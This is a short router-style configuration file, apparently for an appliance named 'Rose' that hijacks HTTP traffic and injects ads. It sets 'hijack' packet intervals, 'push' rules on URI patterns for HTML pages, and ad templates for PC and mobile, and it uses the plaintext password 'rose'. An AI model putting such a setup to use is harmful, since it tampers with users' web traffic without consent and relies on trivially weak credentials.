!
hostname Rose
password rose
enable password rose
log file /root/zebra.log
itf tx enable
itf rx enable
interface 0 enable
interface 1 enable
interface bussiness add eth0
ad template send multi
domain default push
snet default push
adp dmac custom
adp smac custom
adp interval 1
adp switch template pc on
adp switch template mobile on
adp switch on
uri add 1 /$ push 
uri add 2 .*\.html$ push 
uri add 4 /\Q[^\Q]+$ push 
hijack ip interval 1
hijack ip pkt interval 1
hijack pkt interval 1
hijack ip time interval 10
!
line vty
!
end





